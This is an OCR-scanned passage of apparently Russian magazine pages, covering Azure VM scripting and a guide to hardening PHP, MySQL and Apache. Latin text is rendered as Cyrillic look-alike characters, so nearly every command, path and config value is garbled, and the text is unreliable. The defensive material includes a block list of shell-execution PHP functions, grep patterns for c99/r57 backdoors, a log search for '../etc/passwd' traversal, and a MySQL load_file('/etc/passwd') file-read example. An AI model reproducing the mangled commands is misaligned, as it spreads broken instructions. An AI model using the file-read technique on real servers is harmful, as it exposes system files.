(в списке доступны ІІЬипІи, 51Е5, орепБІіБЕ и СепЮБ). Проверяем 
доступные ѴМ: 

Р5> Се'Ь-АгигеѴМ -5егѵісеNате ИіпБгѵ 

Сервер поднят. Чтобы подключиться к удаленной системе по РОР, 
достаточно сохранить РОР-файл при помощи командлета 6е!- 
АгигеРетоІеОезкІорРіІе, который и использовать для организации 
соединения. 

Набор других командлетов *-АгигеѴМ позволяет остановить 
(Біор-), перезапустить (Резіагі-) и стартовать (БіагІ-1 виртуальную 
машину. Формат для всех аналогичен: 

Р5> КезТагТ-АгигеѴМ -БегѵісеМате Ыіпі -Мате ТезТѴМ 

Это самый простой сценарий, который при необходимости 
легко дополняется специфическими установками. Например, ко- 
мандлеты Меѵѵ-АгигеѴМСопбд, АсІсі-АгигеРгоѵізіопіпдСопЛд, АсІсІ- 
АгигеОаІаОізк, АсІсІ-АгигеЕпсіроіпІ и некоторые другие позволяют 
сразу сконфигурировать ѴМ (или обновить настройки имеющейся 
при помощи ОеІ-АгигеѴМ), указав параметры диска, сетевые на- 
стройки, учетные данные и так далее. Например, по умолчанию 
на \^іпсіоѵѵз-машинах доступен РОР-порт (3389) и на Ііпих — ББН 
(22). Чтобы открыть доступ к другому порту, следует настроить 
Еп(1роіп1 при помощи командлета АсІб-АіигеЕпсІроіпІ. 

Собрав все нужное в скрипт, в дальнейшем можно легко разво- 
рачивать любое количество ѴМ: 

Р5> $ітаее = 'САМОМІСАІ Сапопіса1-иЬипТи-12.04-^ 

атсІ64-5егѵег-20120924-еп-и5-30СВ. ѵЬсІ’ 

Р5> $ѵт = Мем-А 2 игеѴМСопб§ -Мате УЬипіиОС -ІпзіапсеБіге 
ЕхТгаБтаІІ -ІтадеМате $іта§е | АсІсІ-АіигеРгоѵізіопіпбСопбв -« 
-Ііпих -ІіпихУзег Узег -РаззмогсІ асІтіпР@55 | АсІсІ-Агиге-' 
ОаіаОізк -СгеаіеМеѵі/ -ОізкБігеІпСВ 50 -ОізкІаЬеІ ’сіізкі' 
-ШМ 0 I Ас1сІ-А2иге0а1:а0і5к -СгеаіеМем -0І5кБІ2еІпев 100 - 
-ОізкІаЬеІ 'сІізк2' -ІУМ 1 ( АсІсІ-А2игеЕпс1роіп'С -РгоТосоІ 
іср -ІосаІРогі 80 -РиЫісРогі 80 -Мате ’ѵлл»;' -ІВБеіМате <-• 
’1Ь_меЬ’ -РгоЬеРогТ 80 -РгоЬеРгоТосоІ ЫТр -РгоЬеРаТЬ '/' 
Р5> Мем-А 2 игеѴМ -БегѵісеМате ІіпБегѵ -ѴМз $ѵт 

Командлет БеІ-АгигеѴМБіге позволяет легко изменить размер 
виртуального диска, поэтому можно не беспокоиться, что места в бу- 
дущем не хватит. 



УПРАВЛЯЕМ \Л/ІЫ00\Ѵ5 АіиРЕ ИЗ ЫМУХ / МАС 05 



Принцип управления в Ыпих и Мае ОБ практически тот же, просто 
используется одна команда и возможностей по конфигурирова- 
нию предоставляется чуть меньше. Скачиваем на сайте Агиге 
по ссылке Іаг.дг архив, распаковываем и ставим, как обычно 
(требуется РуІЬоп, пос1е.]з и прт). В отличие от ѴѴіпсІоѵѵз с множе- 
ством командлетов, здесь после установки получим единствен- 
ный скрипт — агиге. Все параметры можно узнать, выполнив его 
с ключом '\-Ь'. Так, дополнительный параметр ассоипі позволяет 
управлять профилем Агиге. Чтобы получить ссылку для скачи- 
вания риЫізЬзеІІіпдз-файла, достаточно ввести «агиге ассоипі 
Ьоѵѵпіоасі». Далее импортируем профиль: 

$ агиге ассоипі ітрогі ту_риЬ.риЫізЬзе1:ііп§з 



Выбираем образ агиге ѵт ітаде Іізі и создаем виртуальную 
машину: 

$ агиге ѵт сгеаіе --оз Ііпих ту-1іпих-ѵт ^ 

САNОNIСА^ Сапопіса1-иЬипіи-12.04-атсІ64-зегѵег-.-' 

20120924-еп-из-30СВ. ѵЬЬ изегпате ^ 

--Іосаііоп "Еазі УБ" -з 

Параметр -з разрешает ББН-соединение, в ѴМ ѴѴіпсІоѵѵз для РОР ис- 
пользуем соответственно -г. 

Создадим епЬроіпІ: 

$ агиге ѵт епсіроіпі сгеаТе ту-1іпих-ѵт 80 

Для просмотра списка созданных виртуальных машин используем 
команду агиге ѵт ІізС настройки конкретной ѴМ доступны по команде 
агиге ѵт зИоѵѵ, соответственно параметры зІагІІгезІагІІзНиІсіоѵѵп по- 
зволяют управлять состоянием ѴМ. 

Загрузим в хранилище Агиге виртуальный диск и прикрепим его 
к машине: 

$ агиге ѵт сіізк сгеаіе пем_сІаі:а_сІізк •'•/сІаіа.ѵЬсІ «-« 
--Іосаііоп "Еазі 115" 

$ агиге ѵт сіізк аііасЬ ту-1іпих-ѵт пем_сІа1:а_сІізк 

Инструкция сгеаіе не создает (как предполагается), а именно за- 
гружает (иріоасі) готовый образ с ОС или данными, созданный самим 
пользователем. Этот образ может храниться в локальной системе или 
на внешнем ресурсе. Если вместо аиасіі использовать аиасЬ-пеѵѵ, мы 
можем указать новый размер диска (в гигабайтах). 

Собственно, минимум у нас уже есть, теперь объединяем все это 
в скрипт и наслаждаемся автоматизацией. 



ЗАКЛЮЧЕНИЕ 



Как видишь, массовое управление системами и сервисами в облаке 
не представляет особой сложности. Разработчики предлагают АРІ 
и инструменты, позволяющие существенно автоматизировать про- 
цедуру развертывания и всевозможные настройки. □□ 
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СОЗДАЕМ 
МАКСИМАЛЬНО 
БЕЗОПАСНУЮ СРЕДУ 
ДЛЯ ВЕБ-ПРОЕКТОВ 

Сегодня скриптовый язык РНР и база данных 
МуБОІ чуть ли не самые популярные инстру- 
менты при построении веб-приложений. Но 
при работе с ними нужно помнить, что непра- 
вильная установка параметров может привести 
к взлому или утечке информации. Эта подборка 
советов поможет тебе снизить риски, затруднить 
взломщикам сбор сведений и уменьшить вектор 
атаки. 



ИЗУЧАЕМ ОКРУЖЕНИЕ, ОТКЛЮЧАЕМ ЛИШНЕЕ 



Широкая доступность веб-приложений в режиме 24/7 обязывает 
администратора уделять особое внимание безопасности, тем более 
что уследить за качеством кода разработчикам удается далеко 
не всегда и таким уязвимостям, как Х5$, 501 іпіесііоп, С5РР, под- 
вержены многие продукты. Поэтому хочешь не хочешь, а нужно 
подстраховаться. 



Ставим связку АрасЬе + РНР + МуБОІ и начинаем исследования. 
$ зисіо арІ-^е-С ирсіаіе 

$ зисіо ар1:-§е-1: Іпз1:а11 арасИе2 рЬр5 1іЬарасЬе2-тосІ-рІір5 ^ 
рИрБ-туздІ тузяі-зегѵег 
$ зисіо а2ептосІ рИр5 

$ зисіо есИо "$е^ѵе^Nате ІосаІИозІ" 1 зисіо ^ее 
/е-1:с/арасЬе2/соп-Р . сіу-ррсіп 
$ зисіо зегѵісе арасНе2 гезІаг-С 

Смотрим информацию по РНР: 

$ рНр -V 

РНР 5.3.10-1иЬип-Си3.4 мі1:1і БиІіозіп-РаІсЬ (сіі) 

Майнтейнер, который собирает пакет, делает его наиболее уни- 
версальным, подходящим для большинства задач, поэтому список 
скомпилированных модулей может повергнуть в легкий шок: 

$ рНр -т 
[РНР Мосіиіез] 

Ьста'ЬЬ 

Ь22 

саіепсіаг 

[2епс1 Мосіиіез] 
еАссеІега'Сог 

Чтобы просмотреть текущие установки РНР и модулей, следует 
создать простенький РНР-скрипт и просмотреть результат выпол- 
нения в браузере. 

$ зисіо папо /ѵаг/мѵм/рЬріп-Ро.рЬр 
<?рІір рНріп-Ро(); ?> 
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Многослойная броня 



РНР ѴѲГ 8 І 0 П 5.3.10-1 иЬипШЗ.4 
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I ЯІ€ ЕДи Ѵіеѵх 5еапсЬ ТіеппіпаІ Неір 



ихег^КѴОІ 1 рЬр -т 
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• Описание директив 
РНР; рЬр.пе1/ 
тапмаІ/ги/іпі.рІір; 

• докуиентация 
5иЬо5Іп; Ьаггіепегі- 
рЬр.пеі/виЬозіп / 
сопПдиг аІіо п.ЫтІ; 

• сайтРНРШЗ: 



рЬрісІз.огд; 

• проект РЬрЗесІп^о: 



рЬрзесіп ^о; 

• сайт зиРНР; зирЬр. 



огд; 

• сайтЫзсаппег: 
рес|.рЬ р,пеі/ 
р аскаде/Ызсаппег; 

• документация 
МуБОІ: (іеѵ.тузді. 
сот/(Іог /ге ^тап/5.6/ 
ет 

• сайт6гееп501-Р^: 
дгее п ?диид ^ . 



Начало работ: смотрим дефолтные параметры через рЬріп^оП 



Команда "рЬр -т" покажет скомпилированные модули РНР 



Теперь смотрим информационный вывод РНР на странице 
Нир://ІосаІЬо5^/рЬріп^о.рЬр и изучаем настройки. Вероятно, 
на конкретной системе некоторые из них никогда не понадобятся. 

А потому их следует удалить, пересобрав РНР, для увеличения про- 
изводительности и безопасности. Если приложение самописное, 
то никаких проблем не возникнет, сложнее дело обстоит со сто- 
ронними СМ5. К сожалению, разработчики неохотно делятся инфой 
о привязке к модулям РНР, поэтому подбирать нужные приходится 
экспериментально. Для этого собираем РНР только с внешними 
модулями и пробуем постепенно отключать их, тестируя рабо- 
тоспособность; если получаем ошибку в логах или визуально, 
то модуль нужен. Но здесь есть подводные камни. Так, функционал 
некоторых модулей может заменяться внутренней функцией, кото- 
рая работает медленней. Поэтому движок будет функционировать, 
но скорость обработки запросов упадет. Отловить такие модули, 
просто отслеживая работу СМ5, проблематично, поэтому нужно 
еще нагрузить сайт, проконтролировав скорость отклика и загруз- 
ку сервера. Для примера блог на \А/огсіРге55 требует модули: ровіх, 
тЬвІгіпд, сіуре, дсі, ехіі, ісопѵ, вітріехті, ]воп, 7Ір, гІіЬ и, конечно 
же, тузді. Причем состав обязательных модулей для разных 
версий \^огсіРге55 различен, некоторые плагины ^огбРгезз также 
требуют специфических модулей РНР. 

Кроме того, в поставке РНР для *піх идет несколько динамиче- 
ски подключаемых модулей. В иЬипІи их конфигурация находится 
в /еІс/рИр5. Также внимательно смотрим содержимое каталога и. 



ГДЕ ЛЕЖАТ НАСТРОЙКИ 
АРАСНЕ/РНР/МУ501 В цвимтц? 

/еіс/тузді/ту.сп? — файл настроек Му501 
/е(с/арасЬе2/арасЬе2.соп{ — основной файл настроек АрасЬе2 
/е(с/арасЬе2/сопГс1/ — другие конфигурационные файлы АрасЬе2 
/е1с/рЬр5/арасИе2/рЬр.іпі — файл настроек РНР5 
/е(с/рИр5/сопГс1/ — прочие конфигурационные файлы РНР5 



если находим что-нибудь лишнее, смело удаляем или переимено- 
вываем конфигурационный іпі-файл. 

$ ссі /еТс/рЬр5/сопТ.с1/ 

$ зисіо тѵ рсІо_р85д1 . іпі рсІо_ре5д1.сІІ5аЫе 

Можно просто закомментировать строку в файле, но тогда тяже- 
лее будет визуально определить, какой модуль сейчас активен. 

По окончании сортировки не забываем перезапустить веб-сервер. 

Большинство админов, уделяя внимание настройкам веб- 
сервера, забывают о модулях РНР, а они также требуют тонкой 
подстройки под конкретные условия, ведь параметры по умолча- 
нию не всегда оптимальны (их можно узнать из вывода рЬріп^о). 
Некоторые майнтейнеры пакетов или разработчики пресетов 
для Ѵ05 предлагают готовые настройки, к ним нужно присмотреть- 
ся, оценить их и при необходимости изменить. 

Конечно, на мощном сервере с небольшой нагрузкой эти меры 
не покажутся эффективными, но, если сайт находится на Ѵ05, 
эффект от оптимизации почувствуешь сразу. У меня в связке пдіпх + 
РНР-РРМ при всплеске нагрузки постоянно подвисал последний, 
приходилось его постоянно перезапускать. После оптимизации 
(в том числе и параметров, о которых будет сказано далее) проблем 
уже не наблюдалось, и переход на более дорогой тариф не потребо- 
вался. 



СКРЫВАЕМ ВЕРСИЮ СЕРВЕРА И РНР 



Любая программа может иметь уязвимость, поэтому, скрыв от зло- 
умышленника используемую версию, мы можем немного усложнить 
ему задачу. По умолчанию РНР выдает полную информацию: 

$ сигі -I Ь^1р://1оса1Ьо5-к/рЬріп-Ро.рИр 
Бегѵег: АрасИе/2.2.22 (иЬип-^и) 

Х-РомегесІ-Ву : РНР/5.3.10-1иЬипТи3.4 

За это отвечает параметр ехрозе_рНр, который устанавливается 
в /еІс/рЬр5/арасЬе2/рЬр.іпі. Чтобы меньше путаться в собственных 
настройках, лучше создать отдельный конфиг в /еІс/рЬр5/сопГсІ 
или /еІс/арасЬе2/сопГсі/ (для апача), прописав в нем все необхо- 
димое. Данные из соп^сі считываются после основных конфигов. 
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5УЫ/АСК 



1 - » сигі -I Ітр://1оса1Ьо5і/рИріп^о.рЬр 
мГТР/1.1 200 ОК 

Мегі. 19 Оес 2012 11:15:39 СМТ 

огѵег; АрасНе/2.2.22 (ЦЬип(и) РНР/5.3. 10-1иЬипги3.4 жііИ 5иЬо5іп-РаісЬ 
■(-Р{и»еге<1-Ву: РНР/5.3.10-1иЬипГи3.4 
Ѵоіу: Ассері-Епсо(1іп§ 

1 пптрпі -Туре: Іехі/Ьіті 

. '1 - » сигі -I Нпр://1оса1Ьо5І/рКріпТо.р1ір 

'1ІТР/1.1 200 ОК 

~ате; Ме(1. 19 Оес 2012 11:16:51 СМТ 
'І.егѵег: АрасИе/2.2.22 (ІЛипТи) 

. рг у ; Ассерг -Епсойіпв 
<"опіепг-Туре: іехг/Ып»1 

» сигі -I 1иср://1оса11іо5г/рИріпТо.рЬр 
мГТР/1.1 200 ОК 

".. 1 , мегі. 19 Оес 2012 11:18:27 ОМТ 
' ѵі-і АрасЬе 
ѵ.к у: АссерТ-Епсо(1іпв 
■ огпепТ-Туре: Техг/Ыті 

■1 - ♦ I 



Информация о версии веб-сервера и РНР с разными настройками 

а потому их установки перекрывают остальные. В других дистри- 
бутивах и *піх-системах названия каталогов могут отличаться, их 
список можно узнать из вывода рЬріп^о. Отключаем: 

$ 5ис1о папо /е1:с/рІір5/арасІіе2/5есигі1у.іпі 
ехро5е__рИр = 0-р-Р 

И перезапускаем веб-сервер. Советую убрать информацию 
о версии веб-сервера и ОС, указав в настройках апача: 

$ 5ис1о папо /е-кс/арасИе2/соп-Р.(1/5есигі^у 
5егѵег5і8па-Сиге 0-Р-Р 
5егѵегТокеп5 РгосІ 

Сообщения об ошибках, выдаваемые скриптами РНР, также 
могут содержать ценную для атакующего информацию, убираем ее, 
оставляя только вывод в журнал: 

$ 5ис1о папо /е1:с/рЬр5/арасИе2/5есигі'Ьу.іпі 
сІІ5р1ау_еггог5 = 0-Р-Р 
1о8_еггог5 = Оп 

еггог_1о8 = /ѵаг/ 108 /арасИе 2 /рЬр_еггог. 1 о§ 



ОГРАНИЧИВАЕМ ВОЗМОЖНОСТИ ФУНКЦИЙ РНР 



РНР — универсальный интерпретатор, практически неограни- 
ченный по возможностям, но зачастую функции, упрощающие 
работу, ставят под угрозу безопасность системы. Например, запуск 
программы из другого каталога или открытие файла со стороннего 
сайта. Убираем все лишнее: 

$ 5ис1о папо /е'Ьс/рИр5/арасНе2/5есигі'Ьу.іпі 
# Отключаем основные функции 5Ье11^ всего доступно более 
80 функций^ их список подбираем самостоятельно, исходя 
из конкретных условий. Эта возможность устанавливается 
только глобально 

.11. 1 I III ' I Г-н 

НЕ ДОПУСТИТЬ ИЗМЕНЕНИЙ 



Для защиты системных конфигов и файлов веб-приложения можно 
использовать штатную утилиту сЬа«г с ключом 'і' (іттиІаЫе): 

$ зисіо сНаТІіг +і /еТс/{ту.іпі,рЬр.іпі} 

$ зисіо сЬа-С-Сг +і /еХс/рЬр.д/* 

$ зисіо сЬаТТг +і /еТс/ИТТрсІ/соп-Р/ЬТТрсІ.соп-Р 
$ зисіо сЬаТТг +і /еТс/ 

$ зисіо сЬаТ^г +і /ѵаг/мѵіЛя//ІтСт1/туарр.рІір 



в ПОИСКАХ РНР-БЭКДОРА 



Приведу несколько команд, которые помогут, когда понадобится 
найти РНР-бэкдор: 

$ зисіо §гер -ІР 'с99' /ѵаг/ммм/ИТтІ/ 

$ зисіо §гер -ІК ’г57' /ѵаг/ѵллу/ЬТтІ/ 

$ зисіо зЬ -с "бпсі /ѵаг/ммм/ІтСтІ/ -пате \*.рЬр -Туре -Р *-« 
-ргіпТѲ I хагез -0 §гер с99" 

$ зисіо §гер -РРп "(раз5ТЬги|зНе11_ехес1зузТет|Ьазе64__^ 
сІесосІе|-Рореп1-Рс1озе|еѵа1)" /ѵаг/ѵлл»м/ІтСт1/ 



сІізаЫе_-РипсТіопз = "зузТет,ехес,сиг1_ехес,«-« 
сиг1_тиІТі_ехес,раззТЬги,зІіе11_ехес,ргос_ореп,рореп,«-' 
рагзе_іпі_б1е, зЬом_зоигсе, іпі_гезТоге,*-' 
сот_1оасІ_Туре1іЬ, зутііпк" 

# Отключаем возможность открытия и включения внешнего 

# файла 

а11ом_иг1_-Рореп = 0-Р-Р # по умолчанию включен 
а11ом_иг1_іпс1ис1е = 0-Р-Р 

# Ограничим доступ к файловой системе определенным 

# каталогом, выше которого РНР перейти не сможет; можно 

# задать несколько каталогов, разделяя их двоеточием 
ореп_ЬазесІіг = "/ѵаг/ммм/ИТтІ/" 

# Безопасный режим работы с 5^^ 
зц1.за-Ре_тос1е = Оп 

Последний параметр предписывает, чтобы функции для со- 
единения с базой данных (то есть ту5рІ_соппесі() апсі тузр1_ 
рсоппесиі) использовали значения по умолчанию, передаваемые 
аргументы (прописываются, в том числе, в рЬр.іпі) будут игнори- 
роваться. Хотя в некоторых СМ5, вроде ѴѴогсІРгезз, его активация 
может привести к проблемам. 

Ранее существовало несколько инструкций 5а1е_лпосІе*, кото- 
рые активировали безопасный режим и проверяли 1Л0/6Ю поль- 
зователя, каталог исполнения и переменные окружения. В версии 
РНР 5.3.*, используемой на момент написания этих строк в ІІЬипІи 
12.04, они еще работают, но уже объявлены устаревшими. Начиная 
с РНР 5.4, они убраны, и к этому нужно быть готовым. Разработчики 
объясняют, что использование 5а1е_тос1е создавало больше иллю- 
зию безопасности, чем собственно безопасность. Ведь этот режим 
применим только к РНР, тогда как для того, чтобы пробить защиту 
сервера, существует множество других, нередко более простых 
путей, а потому все сопутствующие вопросы необходимо решать 
при помощи комплексных инструментов. Кроме того, его активация 
нередко вызывала проблемы с рядом СМ5. Аналогичная участь 
и по тем же причинам постигла набор переменных тадіс_риоІе 5 _*, 
управляющих экранированием кавычек и скобок, в большинстве 
случаев их просто отключали (например, «тадіс_рио 1 е 5 _дрс = 011»). 

На некоторых веб-сайтах аплоад файлов через веб-интерфейс 
не используется, зачем же тогда оставлять лишнюю лазейку для 
злоумышленника? Закроем ее, заодно ограничив размер Р05Т- 
запроса, так мы не позволим отправлять нестандартные запросы, 
которые будут отбирать ресурсы сервера: 

$ зисіо папо /е-Ьс/рЬр5/арасЬе2/5есигі^у.іпі 
Я1е_ир1оа(І5 = 0-Р-Р 
ро5І:__тах_5І2е = 1К 

Или, если такая возможность нужна, принудительно ограничим 
размер файла, когда пользователям, например, разрешено добав- 
лять картинки или документы небольшого размера. 
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Многослойная броня 



б1е_ир1оасІ5 = Оп 
ир1оас1_тах_б1е5І2е = 1М 
ро5І:_тах_5І2е = 1М 

Поскольку ро5І_тах_5І2ѳ влияет и на загрузку файла, его раз- 
мер пришлось увеличить. 

Также рекомендуется ограничить список доступных методов 
средствами АрасЬе: 

<Оігес1огу /ѵаг/ммм/Ыт1> 

# Обрабатываем только 

# 6ЕТ- и Р05Т-запросы 
<Ііті1Ехсер1: СЕТ Р05Т> 

Огсіег а11ом,сІепу 
</Ііті1Ехсер^> 

</Оігес1огу> 



НАСТРАИВАЕМ 5УН05ІЫ 



Вывод «рбр -V» показывает, что РНР в УЬипІи уже собран с патчем 
БиЬозіп ( багсіепеб-рЬр.пе^/5иЬо5Іп ]. обеспечивающим низкоуров- 
невую защиту (Епдіпе Ргоіесбоп) данных против атак на пере- 
полнение буфера, уязвимостей форматной строки и ошибок в ІіЬс 
геаІраіЫ). Возможности фильтрации, шифрования, блокировок 
переменных, отсылки кода ответа, перенаправления браузера, за- 
писи событий и прочие обеспечиваются высокоуровневой частью, 
реализованной в виде модуля, который по умолчанию не устанав- 
ливается: 

$ зисіо ар1:-§е1: іпзіаіі рЬрЗ-зиИозіп 

Настройки ЗиЬозіп производятся в конфигурационном файле 
/еІс/рЬрб/соп^б/зиЬозіп.іпі. Все переменные, кроме отвечаю- 
щей за загрузку модуля, закомментированы, поэтому защитные 
установки необходимо активировать самостоятельно, осозна- 
вая назначение. Подробное описание параметров можно найти 
в тап-странице и на сайте проекта ( Ьагбепеб-рЬр.пеІ/зиЬозіп/ 
сопНдигаІіоп.ЫглІ ). 

Кроме ЗиЬозіп, развиваются еще несколько проектов, позволя- 
ющих повысить защищенность приложений, написанных на РНР. 
Так, зиРНР ( зирЬр.огд І предлагает оболочку для РНР и модуль 
для АрасЬе (тосі_зирЬр), сочетание которых позволяет выполнять 
РНР-скрипты с правами их владельца. И хотя последний релиз был 
выпущен уже более трех лет назад, наработки актуальны и сегодня. 

Разработчики Ызсаппег (песІ.рпр.пеі/раска де/Ызсаппег ) пред- 
лагают механизм задания доступа к скриптам в стиле Ыассезз. 



АУДИТ ЖУРНАЛЬНЫХ 
ЗАПИСЕЙ 



Несколько полезных команд для выявления 
нарушителей спокойствия: 



На прилагаемом 
к журналу диске 
ты найдешь видео- 
ролик, в котором 
показано, каким 
параметрам РНР, 
МуЗОІ и АрасЬе 
следует уделить 
внимание для соз- 
дания максимально 
безопасной среды. 



$ зисіо еегер -і "сІепіед|еггог1магп" 
/ѵаг/ 1 о 8 /Ы: 1 :рсІ/еггог _108 
$ зисіо бгер ’1о§іп.рІір' /ѵаг/1о§/ІтІ:і:ргі/»-' 
еггог_1ое 

$ зисіо §гер " . . .еТс/раззысІ" /ѵаг/1о§/*-^ 
ІтС1:рсІ/рЬр_зсгірТз_еггог . 1о§ 



В марте 2012 года проект достиг состояния стабильного. РНРЮ5 
( рНрібз.огд І — простая в использовании Ю5 для РНР, которая 
работает на основе правил и позволяет определить атаку на при- 
ложение по специфическим признакам. Проект РЬрВесІпІо ( рЬрзес. 
огд/рго]есІ5/рЬр5есіп1о 1 предлагает аналог функции рЬріп^оО, 
предоставляющий больше информации по безопасности РНР и ре- 
комендации по ее усилению. 



УПРАВЛЯЕМ ПРОЦЕССАМИ РНР 



Сам интерпретатор РНР имеет множество переменных, по- 
зволяющих управлять его работой и повысить защищенность, 
в том числе при 00о5. Так, все админы, управляющие работой 
веб-сервера, знают о параметрах ѵуогкег_ргосе5зе5 и ѵѵогкег_ 
соппесііопз, но в настройках РНР есть и свои аналоги. Например, 
РНР_РС61_СН1С0РЕМ задает количество дочерних процессов, 
запускаемых РНР для обработки входящих запросов. По умолча- 
нию эта функция отключена, и значение переменной равняется 
о, поэтому все запросы обслуживает только мастер-процесс, 
что подчас отрицательно сказывается на производительности 
и главное — в случае подвисания работа сервиса блокируется. 
Установив значение >0, эту проблему мы решаем: если дочерний 
процесс подвиснет, он будет автоматически перезапущен мастер- 
процессом. На современных многоядерных серверах увеличение 
этого значения способно дать существенный прирост производи- 
тельности. Но увлекаться количеством даже на мощных системах 
не стоит, ведь обслуживание дочерних процессов требует новы- 



9 сопГі^игапол Гог рЬр іоЬозіп гяоаиіе 
Г - І 0 П» 5 иІЮ 5 ІП .50 



• Иоаиіе $етпк$ ; 



іЬе Г0ІІ0МІП8 ѵаіиеі аге гИе іпгегпаі (іеГаиІГ хетп^з апд зег іпіріісіі 
Ге«1 Ггее го якнІіГу іо уоиг пеебз 
(Іосіапелгаііоп сап Ье Гоипсі аі; 

Ыір://мммг.Ьагаепе(і-рЬр.пеі/5иЬозіп/сопГі8игаііол.Ыт1 

ог Ьаѵе а Іоок іпіо /изг/зЬаге/дос/рЬрЗ-зиЬозіп/ехаарІез/зиЬозіп.іпі.кг 

[зиЬозіп] 

І.088ІП8 СопГі^игаііоп 
зиЬо$іп.І08.зузІ0{[ ■ 
зиЬозіп.І 08 .зузІ 08 .Гасі 1 ІІу • 9 
зиЪозіп.Іов-зузІок.ргіогііу > і 
зиЬозіп.Іо^.зарі ■ 
зиЬ 05 іп.І 08 .зсгірі « О 
зиНозіп.І0{.рЬрзсгірі « О 
зиЬозіп.Іов.зспрі.пате * 
зиЬозіп.Іох.рЬрзспрі .пате <• 
зиЫ>зіп. 1 о 8 .изе-х-Гоп«аг( 1 е( 1 >Гог ■ оГГ 

Ехесиіог Орііопз 
зиНозіп.ехесиіог.тах_(1еріИ ■ О 
зиЬозіп. ехесиіог. іпс1и<1е.тах_ігаѵегза1 ■ О 
. зиНозіп. ехесиіог. іпсІисІе.мЬііеІізі - 
. зиЬозіп. ехесиіог. шсІисіе.ЫаскІізі ■ 
зиЬозіп. ехесиіог. іпс1и(1е.а11о«г_і«гііаЫе_Гі1ез » оп 
зиЬозіп. ехесиіог. Гипс. мЬііеІізі » 
зиЬозіп. ехесиіог. Гипс. Ыаскіізі • 



По умолчанию в ЗиЬозіп все параметры закомментированы 




Информация, выдаваемая РЬрЗесІп^о, позволяет избежать проблем безопасности 
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5УМ/АСК 



« РешетЬег го егііі /е(с/ту5^1/(^еЬ1ап.сп^ «кНеп сНап^іп§ (Ье $оскеі Іосаііоп. 
Ісііепі) 

( ■ ' ' - 3306 

зоскеі > /ѵаг/гип/ту5^1(1/п|у5^1(^.50ск 

« Неге І5 еп^гіе5 ^ог зоте зресі^іс рго^гаілз 

« ТНе ^о11о«іП8 ѵаіиез аззиіяе уои Ьаѵе аГ Іеазі: 32М гаш 

в ТИІ5 «из ^огтаііу кпо*т аз [за^е_тузр1(1] . ВоіН ѵегзіопз аге сиггепИу рагзер. 
[тузрід.за^е] 

■ ' М І: * /ѵаг/гип/туз9І(1/піу5ЯІ(і.50Ск 

пісе «о 

[тузрій] 

« * Вазіс 5еШп8з 

« шузяі 

і'ігі-^ііе ■ /ѵаг/гип/шузя1(1/ту5ЯІ().рі(1 

-"I « /ѵаг/гип/тузя1сІ/тузя1(].зоск 

I -г - 3306 

ь.г .'Иіг ■ /изг 

' 1 .И.ІІ 1 Г • /ѵаг/ІіЬ/тузяІ 

(шрЯіг ■ /(шр 

Іс-пюзза^ез-діг > /изг/зНаге/тузяІ 

л іі'-ехіегпа1-1оскіП8 
и 

ч Іпзіеад зкір-пеімогкіл^ (Ье <1е^аи1( із пом (о 1із(еп опіу оп 
» 1оса1Ьоз( мЫсЬ із тоге сотраііЫе апсі із по( Іезз зесиге. 
ьіпгі-асМгезз ■ 127.0.0.1 

^ * Ріпе Типіпв 



По умолчанию Му501 может загружать локальные файлы 



Если сеть все же нужна, возможно, ее стоит ограничить лишь 
локальным узлом (в ІІЬипІи так установлено по умолчанию) или 
указать конкретный адрес: 

Ьіпс1-асІсІге5$=127 . 0 . 0 . 1 

Здесь главное — не забыть открыть доступ для пользователя, 
который будет выполнять удаленное управление: 

ту5ЯІ> еКАМ 5ЕІЕСТ, ІМ5ЕКТ ОN СІЬ.* ТО ’ и5ег’@' ИозТ ‘ ; 

Чтобы еще больше усложнить жизнь хакеру, учетную запись 
гооі лучше переименовать: «РЕМАМЕ У5ЕР гооі ТО изег;». Ну а ког- 
да деваться некуда и необходимо предоставить доступ к мускулу 
извне, следует использовать ѴРМ и прикрыть порт 3306 файрво- 
лом, ограничив к нему доступ только с доверенных сетей. В постав- 
ке МуЗОІ идет тестовая база данных, доступная для анонимного 
пользователя, удаляем ее и проверяем наличие лишних учеток: 

ту5я1> ОКОР ОАТАВА5Е ТезТ; 

ту$я1> 5НОМ еКАNТ5 РОК ' ІосаІЬозТ * ; 

ту5д1> 5НОМ СКАМТ5 РОК 



шейного внимания ОС. Лучше выбрать первоначальное значение 
в районе пяти и затем экспериментировать, увеличивая или 
уменьшая его. 

Установка значения в О имеет еще одну проблему. Для РНР- 
приложений свойственны утечки памяти, поэтому процессы жела- 
тельно периодически перезапускать. Это регулирует переменная 
РНР_РС61_МАХ_РЕ00Е5Т5, устанавливающая максимальное чис- 
ло запросов, которое должен обработать процесс интерпретатора. 
При достижении лимита процесс останавливается. Если работал 
только мастер-процесс, перезапустить его будет некому. Значение 
РНР_РС61_МАХ_РЕ01)Е5Т5 по умолчанию установлено в 500, чего 
в большинстве случаев достаточно. Установка в О отключает пере- 
запуск, но этого лучше не допускать. 

Переменные РНР устанавливаются, как и обычные переменные 
среды, через ѵѵгаррег-скрипт: 

#!/Ьіп/Ьа5И 

ехрогі РНР_РСеі_СНІЮКЕЫ=4 
ехроП РНР_РССІ_МАХ_КЕдиЕ5Т5=5000 
ехес /и5г/1іЬ/с§і-Ьіп/рНр5 

Сервер ІідЬирсІ позволяет задать значения переменных РНР прямо 
в своих конфигах, это более удобно. 

Указав время выполнения скриптов и максимальный размер 
выделяемой памяти, мы можем лучше противостоять 00о5. 



У МуБОІ есть одна очень удобная функция, позволяющая за- 
грузить локальный файл, которая обычно используется для запол- 
нения таблиц. Работает она примерно так: 

ту5я1> 5Е1ЕСТ 1оас1_Я1е('7е‘Сс/ра55мс1") ; 

Эта функция по умолчанию включена, в чем можно убедиться, 
введя «зЬоѵѵ ѵагіаЫез», но после первоначальной настройки зача- 
стую в ней нет необходимости, ведь злоумышленник может попро- 
бовать прочитать и системный файл. Поэтому ее лучше отключить, 
сделав в ту.сп^ запись «ІосаІ-іпЯІе=0». 

Приведенные меры добавят хакеру хлопот, но если он сформиру- 
ет запрос, который с точки зрения приложения будет легитимным, 
то получит все, что хотел. Здесь на помощь приходит специальная 
105 6гееп501-Р\Л/ ( огеепзді.пе^. на апдейте), которая, работая 
как прокси-сервер между веб-приложением и БОС-сервером, ана- 
лизирует 501-команды на предмет аномальных запросов и инспек- 
тирует команды администрирования 501-сервера, которые часто 
используются взломщиками (ОРОР, СРЕАТЕ итак далее). 



ЗАКЛЮЧЕНИЕ 



Для защиты сайта или отдельного веб-приложения не следует 
ограничиваться одной мерой. Только комплексный подход спосо- 
бен дать результат. □□ 



$ 5иао папо /еТс/рЬрЗ/арасИег/зесигіІу.іпі 
тах_ехеси‘Сіоп_1іте = 30 
